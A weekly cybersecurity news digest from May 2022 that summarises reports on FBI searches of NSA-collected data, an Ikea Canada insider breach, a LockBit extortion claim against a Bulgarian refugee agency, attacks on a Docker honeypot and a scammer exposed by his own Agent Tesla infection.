WEEK OF MAY 09, 2022
FBI conducted potentially millions of searches of Americans’ data last year, report says
- Searches in national-security investigations came without warrants, could stoke privacy concerns in Congress.
- An annual report published Friday by the Office of the Director of National Intelligence disclosed that the FBI conducted as many as 3.4 million searches of U.S. data that had been previously collected by the National Security Agency.
- Senior Biden administration officials said the actual number of searches is likely far lower, citing complexities in counting and sorting foreign data from U.S. data.
- It couldn’t be learned from the report how many Americans’ data was examined by the FBI under the program, though officials said it was also almost certainly a much smaller number.
Ikea Canada breach exposes 95K customer records
- An unauthorized employee accessed Ikea’s customer database, but it’s unclear what the intention was.
- The employee performed unsanctioned searches of the database between March 1 and 3, Kristin Newbigging, public relations leader at Ikea Canada, explains to Dark Reading. She adds that no banking information was exposed during the unauthorized system access.
- However, personally identifiable information was compromised, according to reports. That includes customer names, email addresses, phone numbers, and postal codes, along with IKEA Family loyalty program numbers in some cases.
- The company said there is no action required by Ikea customers, and that the company took “steps to prevent the data from being used, stored, or shared with any third parties.”
Russian ransomware group claims attack on Bulgarian refugee agency
- A ransomware group believed to have strong ties within Russia said Wednesday that it will release files it took from the Bulgarian government agency responsible for refugee management, a nation that has reportedly hosted hundreds of thousands of fleeing Ukrainians.
- LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers. “All available data will be published!” the notice read under the group’s trademark bright red countdown clock, which has a May 9 publication date but no specific posted ransom demand.
- he agency didn’t immediately return an emailed request for comment. A spokesperson at the Bulgarian embassy in Washington, D.C., told CyberScoop Wednesday he didn’t have information on the incident and would look into it.
- The agency’s website remains functional, but a notice on the site’s home page includes a notice that “due to network problems, the e-addresses of the State Agency for Refugees at the Council of Ministers are temporarily unavailable!!!” according to a Google translation.
Expeditors outperforms Q1 forecasts despite being hobbled by cyberattack
- Tonnage was down because of the attack and freight costs were up, but revenues and slower expense growth allowed profits to rise
- It said its costs to fix a bevy of the problems created by the cyberattack — “investigation, recovery and remediation, including costs to recover its operational and accounting systems” — were estimated at $20 million.
- However, Expeditors added that it does not expect to incur significant capital expenses as a result of the cyberattack.
Docker under Siege: Cybercriminals compromise honeypots to ramp up attacks
- Cloud containers are increasingly part of the cybercrime playbook, with researchers flagging ongoing scanning for Docker weaknesses along with rapid exploitation to infect systems with coin-miners, denial-of-service tools, and ransomware.
- On May 5, researchers at cloud-management platform Uptycs said that attackers compromised the firm’s honeypot, a Docker server configured to allow connections through the remote Docker API.
- The attacks resulted in the cybercriminals installing cryptomining software and creating a reverse shell, which would have allowed them to explore the server in real time.
- The company has detected 10 to 20 attempts to compromise the honeypot server every day, suggesting that attackers have increased their interest in Docker-based infrastructure, says Amit Malik, director of threat research at Uptycs.
Scammer infects his own machine with spyware, reveals true identity
- An operational slip-up led security researchers to an attacker associated with Nigerian letter scams and malware distribution, after he infected himself with Agent Tesla.
- Researchers from Malwarebytes got on his trail when they identified a group they track as “Nigerian Tesla” among numerous threat actors targeting Ukrainian entities.
- Malwarebytes had tracked the group for years initially while it was engaged in a string of so-called 419 advance fee fraud (aka Nigerian letter scams), where victims receive emails promising them a generous commission for facilitating a money transfer involving a large sum.
- Over the past two years, Malwarebytes researchers had observed the threat actor switching from 419 scams to distributing Agent Tesla, a widely used remote-access Trojan (RAT) for stealing personal data from infected systems.